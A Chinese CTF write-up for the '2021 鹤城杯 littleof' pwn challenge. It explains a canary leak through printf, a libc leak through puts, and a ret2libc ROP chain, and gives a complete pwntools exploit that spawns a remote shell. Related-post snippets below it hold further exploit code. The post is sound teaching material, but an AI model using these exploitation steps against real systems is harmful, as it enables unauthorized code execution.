【PWN · ret2libc | Canary】[2021 鹤城杯]littleof

最新推荐文章于 2024-12-05 19:50:50 发布
原创 最新推荐文章于 2024-12-05 19:50:50 发布 · 1.6k 阅读 · 12 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#pwn #ctf #ret2libc #Canary

本文详细介绍了利用栈溢出和Canary保护机制进行漏洞利用的过程,包括如何泄露Canary值,利用printf格式化字符串漏洞,以及通过ret2libc技术执行自定义shellcode。作者分享了在调试过程中遇到的问题,如环境配置和字符串对齐的理解,并鼓励持续学习和总结。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

最近比较忙,这道题用了好长时间来debug,甚至贡献了第一次在csdn上提问。。。

目录

前言

一、题目重述&思路分析

二、exp 

三、Canary

四、萌新遇到的困难 

总结

前言

Canary作为经典且基本的栈保护措施,在后期的题目中必然是基本标配。作为新手小白,最初这几次接触有点难受,but多做总结嘛。——ret2libc也依旧不熟练,做总结也是意料之中的事情。

一、题目重述&思路分析

典型存在栈溢出,程序开启了Canary保护。

程序有两次输入,都存在栈溢出。

printf有点格式化字符串漏洞的意思在里面,主要关心的就是%s打印data(地址)存储的值。在这里呢,就是把buf数组——更确切地说是buf首地址开始的字符串进行打印——如果我们写大量的数据覆写掉buf数组长度的字符串的结尾标志,那么下一行printf就可以泄露大量的栈上信息——泄露出我们的Canary

然后我们就可以通过第二个进行泄露libc,再劫持程序控制流到main,为再次进行栈溢出做准备。

主要的exp就作注释写在下方了。 

二、exp 

from pwn import *
from pwn import u64,p64

# io=process("./littleof")
io=remote("node4.anna.nssctf.cn",28750)
elf=ELF("./littleof")

context(arch="amd64",os='linux',log_level='debug')

#payload1:准备泄露canary
payload1=b'a'*(0x50-0x9)+b'b'   #构造尾部不同的垃圾数据,使得能够定位到最后
io.recvuntil(b'overflow?')
io.sendline(payload1);          #注意,最后发了个回车,对应\x0a需要剪掉
io.recvuntil(b'ab')             #定位到canary之前
canary=u64(io.recv(8))          #接收canary,但是勿忘回车
canary=canary-0x0a              #减去回车
print('canary:',hex(canary))

pop_rdi_ret_addr=0x400863
ret_addr=0x40059e               #ret只是为了将system抬高4字节,具体可以看我的另一篇博客
                                #https://blog.youkuaiyun.com/Mr_Fmnwon/article/details/130959123?spm=1001.2014.3001.5501
puts_plt=elf.plt['puts']
main_addr=0x400789
puts_got=elf.got["puts"]

print("puts_plt:",hex(puts_plt))
print("plt_got:",hex(puts_got))

#payload2:泄露libc
payload2=b'a'*(0x50-8)+p64(canary)+b'a'*8       #绕过canary保护的垃圾数据
payload2+=p64(pop_rdi_ret_addr)+p64(puts_got)   #pop rdi来设置puts的参数
payload2+=p64(puts_plt)                         #调用puts函数
payload2+=p64(main_addr)                        #返回有效地址且再次进行栈溢出

io.sendlineafter(b'Try harder!',payload2)
puts_addr = u64(io.recvuntil(b"\x7f")[-6:].ljust(8,b'\x00'))    #获取puts真实地址
print("real addr:",hex(puts_addr))

from LibcSearcher import *
#--------------------------------ret2libc---------------------------#
libc=LibcSearcher("puts",puts_addr)
base=puts_addr-libc.dump('puts')
system=base+libc.dump('system')
bin_sh=base+libc.dump('str_bin_sh')
#-------------------------------------------------------------------#

#payload3:构造调用system("/bin/sh")
io.recvuntil(b'overflow?')
payload3=b'a'*(0x50-8)+p64(canary)+b'a'*8
payload3+=p64(ret_addr)
payload3+=p64(pop_rdi_ret_addr)+p64(bin_sh)
payload3+=p64(system)
payload3+=p64(main_addr)

io.sendline(payload3)
io.interactive()

三、Canary

作为萌新,也是通过许多资源才了解到一些知识,放到这里也方便读者

Canary学习(泄露Canary)_西杭的博客-优快云博客

Canary学习(爆破Canary)_funcanary_西杭的博客-优快云博客 

四、萌新遇到的困难 

为什么一道题熬了很久呢?因为最近换了台电脑,也在试/配环境 

因为对比其他师傅的exp,一模一样,但是他们可以跑通,我不行,而且报错。。。

无奈只好去提问

新电脑环境,python关于转义字符的报错-编程语言-优快云问答 

报错在转义符,还以为是环境配置的原因。通过尝试运行其他师傅的代码,发现没有任何问题。然后就逐字逐句对比,发现了影响我的代码的一点差异——字符串对齐 

str.ljust(8,"\x00")
str.rjust(8,"\x00")

如果读者有兴趣找找网上其他的本题的exp,可能会发现有的人用rjust,有的人用ljust,有的人两者都用。

——左对齐,右对齐。什么时候左对齐,什么时候右对齐呢?在这一点上不确定,我想,是对获取信息的格式/长度/大小端序的相关知识并不明确。而网上的资源也太少了,或许是我没找到。如果有大佬能够讲讲,recv(num1).l/rjust(num2,"\x00")以及num1该如何选取该多好啊!

此外sendline会在结尾发送一个回车,作为萌新,勿忘!

总结

不断总结,不断求学

反思:泄露canary之后一定要记得处理掉多余的东西————[2021 鹤城]littleof
m0_73858054的博客
02-28 875
这是一道libc类型的题目,应该是不难的,月余之前遇到。当时思路什么的都理清楚了,脚本也写出来了,结果死活获取不到shell…最后又重写了一遍才跑成功了。今天又想起来这件事儿,重新捋了一遍。终于是让我找到了原因!现在把这个原因记录下来,惊醒自己千万要注重细节,不要再犯这种错误。
pwn学习-ret2libc3
Sa1nZen的博客
06-30 684
pwn学习-ret2libc3
NSSCTF [2021 鹤城]littleof
红叶的博客
03-02 982
很显然栈溢出漏洞位于read函数中,buf大小为0x50,而read函数的第三参数,也就是输出/写入/输出的最大的字节长度为0x100,就是2个buf大小的数据。开启 Canary : RBP 位于 0x50 + 0x08,Canary位于0x50 - 0x08,Return Address位于0x50 + 0x16。因为Canary是栈中的一个随机值,我们通过printf泄露Canary,然后将其填充至它本来应该在的位置,就能通过检查。
[2021 鹤城]littleof [泄露canary,libc] 总结
qq_48466156的博客
06-15 513
[2021 鹤城]littleof [泄露canary,libc] 总结
Canary保护
u014377094的博客
04-25 1377
之前做题没做过canary类型,今天补知识盲点遇到canary,恰好也写一篇吧。 学pwn时基本会遇到几种保护类型,如RELRO,PIE,NX,还有Canary,这里解释一下canary。 栈溢出保护是一种缓冲区溢出攻击缓解手段,当函数存在缓冲区溢出攻击漏洞时,攻击者可以覆盖栈上的返回地址来让shellcode能够得到执行。当启用栈保护后,函数开始执行的时候会先往栈里插入cookie信息,当函数真正返回的时候会验证cookie信息是否合法,如果不合法就停止程序运行。攻击者在覆盖返回地址的时候往往也会将c
littleof ——攻防世界
qq_41696518的博客
08-30 1907
littleof ——攻防世界
2021鹤城pwn部分wp
eeeeeight的博客
10-09 2233
littleof 白给的ret2libc, 第一个输出泄露canary, 第二个输出泄露libc基址顺便控制一下返回地址再返回去输入, 之后就getshell咯(摊手) #!/usr/bin/env python #coding=utf-8 from pwn import* sh = remote("182.116.62.85", 27056) #sh = process('./littleof') elf = ELF('./littleof') libc = ELF('./libc-2.27.so')
pwn学习-ret2libc1
Sa1nZen的博客
06-02 383
pwn学习-ret2libc1
pwn学习-ret2libc2
Sa1nZen的博客
06-16 288
pwn学习-ret2libc2
pwn小白入门06--ret2libc
weixin_45943522的博客
10-25 8696
概述: 前文介绍了ROP的基本原理,但前面的方法有一些局限性,一旦目标程序调用的函数较少,或者使用动态编译,就会导致我们可以利用的gadget变少,从而无法达到利用效果。为了解决这种问题,我们可以选择使用ROP的方式,到动态链接库里面寻找gadget。即ret2libc。 动态链接库: 说动态链接库之前,先简单介绍一下库,库是一种软件组件技术,库里面封装了数据和函数,比如常用的printf,get函数。前文所说的ret2syscall所使用的程序是静态链接的,即在程序编译的时候就将整个库链接到程序中,一般这
ctfwiki开始的pwn之旅 4.ret2libc
2301_80361487的博客
12-05 1449
当一个函数被调用过后,got表里保存了他在内存中的地址,可以通过泄漏got表内存来泄漏函数地址,然后可以根据起泄漏的函数地址获得其libc版本,从而计算其他函数在内存空间中的地址。为什么不能直接跳到got表,通过前面的前置知识我们知道plt表中的地址对应的是指令,got表中的地址对应的是指令地址,而返回地址必须保存一段有效的汇编指令,所以必须要用plt表。可执行文件里保存的是plt表的地址,对应plt地址指向的是got的地址,got表指向的是glibc中的地址。经在 ida 中查找,确实也存在。
基本ROP之ret2libc3
至臻求学,胸怀云月
02-15 7098
ret2libc思路 ret2libc就是控制函数的执行libc中的函数,通常是返回至某个函数的 plt 处或者函数的具体位置 (即函数对应的 got 表项的内容)。一般情况下,我们会选择执行 system("/bin/sh"),因此我们通常需要找到 system 函数的地址。 ret2libc通常可以分为下面这几类: 程序中自身就含有system函数和"/bin/sh"字符串 程序中自身就有s...
鹤城PWN几道题的writeup
10-09 663
目录 babyof easyecho littleof onecho babyof #encoding=utf-8 from pwn import * context(os='linux',arch='amd64') fpath='/home/kali/ctf/pwn/ti/hb/babyof/babyof' r = process(fpath) #r = remote("182.116.62.85",21613) elf = ELF(fpath) libc =elf.libc poprd
二进制安全-第四天
hsjdbbsbsn的博客
03-20 338
在调试修改后的ret2shellcode的题目时,在本地运行出错,在ctf题目中也会经常遇到远程能打通,本地打不通的情况,特别是调用libc动态链接库的程序,在环境差异的情况下,很有可能会出现。而这一段代码的作用是system所包装的,和system调用sh的作用是一样的。使用的自带函数中,例如printf并不是简单实现的,而是调用写好的存放在系统层的功能,通过动态链接调用。ROP的目的:程序中没有完整的可以调出这样的汇编代码,但有对应的代码片段,用rop执行分离的代码也能达成相同的作用。
首届“鹤城”河南·鹤壁CTF网络安全挑战赛部分WP
七堇年的博客
12-24 2797
首届“鹤城”河南·鹤壁CTF网络安全挑战赛WP
首届"鹤城"CTF网络安全挑战赛 - 初赛writeup
渗透测试研究中心
12-22 2858
WEB1.middle_magic%0a绕过第一关最后加%23是#数组绕过第二关json 弱类型比较http://182.116.62.85:20253/?aaa=%0apass_the_level_1%23POST:admin[]=1&root_pwd[]=2&level_3={"result":0}flag{f03d41bf6c8d55f12324fd57f7a00427}2...
2021CTF鹤城挑战赛题目附件
NNanfeng
10-08 943
除了web题 所有的题目文件都在这里 链接:https://pan.baidu.com/s/1XXFSdNnlMdmlJtCMnl5dSg 提取码:nx87 –来自百度网盘超级会员V1的分享 需要的师傅请自行提取哦
电动汽车数据集:2025年3K+记录-EV Electrical Vehicles Dataset
08-19
电动汽车数据集:2025年3K+记录 真实电动汽车数据:特斯拉、宝马、日产车型,含2025年电池规格和销售数据 关于数据集 电动汽车数据集 这个合成数据集包含许多品牌和年份的电动汽车和插电式车型的记录,捕捉技术规格、性能、定价、制造来源、销售和安全相关属性。每一行代表由vehicle_ID标识的唯一车辆列表。 关键特性 覆盖范围:全球制造商和车型组合,包括纯电动汽车和插电式混合动力汽车。 范围:电池化学成分、容量、续航里程、充电标准和速度、价格、产地、自主水平、排放、安全等级、销售和保修。 时间跨度:模型跨度多年(包括传统和即将推出的)。 数据质量说明: 某些行可能缺少某些字段(空白)。 几个分类字段包含不同的、特定于供应商的值(例如,Charging_Type、Battery_Type)。 各列中的单位混合在一起;注意kWh、km、hr、USD、g/km和额定值。 列 列类型描述示例 Vehicle_ID整数每个车辆记录的唯一标识符。1 制造商分类汽车品牌或OEM。特斯拉 型号类别特定型号名称/变体。型号Y 与记录关联的年份整数模型。2024 电池_类型分类使用的电池化学/技术。磷酸铁锂 Battery_Capacity_kWh浮充电池标称容量,单位为千瓦时。75.0 Range_km整数表示充满电后的行驶里程(公里)。505 充电类型主要充电接口或功能。CCS、NACS、CHAdeMO、DCFC、V2G、V2H、V2L Charge_Time_hr浮动充电的大致时间(小时),上下文因充电方法而异。7.5 价格_USD浮动参考车辆价格(美元).85000.00 颜色类别主要外观颜色或饰面。午夜黑 制造国_制造类别车辆制造/组装的国家。美国 Autonomous_Level浮点自动化能力级别(例如0-5),可能包括子级别的小
基于单片机的温度监测系统设计(51+1602+18B20+BZ+KEY3) 0448
最新发布
08-19
包括:源程序工程文件、Proteus仿真工程文件、电路原理图文件、配套技术手册、论文资料等 1、采用51单片机作为主控单元芯片; 2、采用DS18B20传感器检测温度; 3、采用LCD1602显示实时温度及报警上下限; 4、温度超限时,蜂鸣器将进行报警; 5、可通过按键设置报警上下限;
2024春秋冬季pwn
02-18
### 2024春秋冬季PWN比赛详情及参赛指南 #### 比赛概述 2024春秋网络安全联赛冬季赛中的PWN类别挑战旨在测试选手在二进制漏洞挖掘与利用方面的能力。这类竞赛通常涉及对存在安全缺陷的程序进行分析、调试以及开发相应的攻击载荷来获取控制权。 #### 技术要点 对于此类赛事,掌握以下技术至关重要: - **格式化字符串漏洞**:通过精心构造输入使目标应用程序泄漏内存数据,如canary和libc基址等敏感信息[^2]。 - **缓冲区溢出**:理解如何填充特定长度的数据覆盖返回地址,并结合ROP链实现任意代码执行。 - **绕过保护机制**:面对现代操作系统引入的各种防护措施(DEP/NX bit, ASLR),需具备相应对策的知识,比如堆风水或部分覆写技巧。 #### 实战准备建议 为了更好地迎接这一挑战,推荐提前熟悉并练习以下几个方面: 1. 利用公开资源学习常见漏洞原理及其修复方法; 2. 参考过往CTF题目解析文档加深印象;例如,在处理CVE编号为`CVE-2023-51385`的相关问题时可借鉴已有的writeup资料[^1]; 3. 掌握基础工具链的应用,包括但不限于GDB调试器、pwntools库等辅助脚本编写工作。 #### 示例代码片段展示 下面给出一段简单的Python代码用于演示基本的ROP攻击思路: ```python from pwn import * # 远程连接设置 r = remote('target_ip', port) # 构造payload offset = cyclic_find(0x6161616a) # 找到偏移量 pop_rdi_ret = 0x4012b9 # pop rdi; ret; bin_sh_addr = next(libc.search(b'/bin/sh')) system_plt = libc.symbols['system'] payload = flat([ 'A' * offset, pop_rdi_ret, bin_sh_addr, system_plt ]) # 发送payload给服务端 r.sendline(payload) r.interactive() ```
评论 10
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值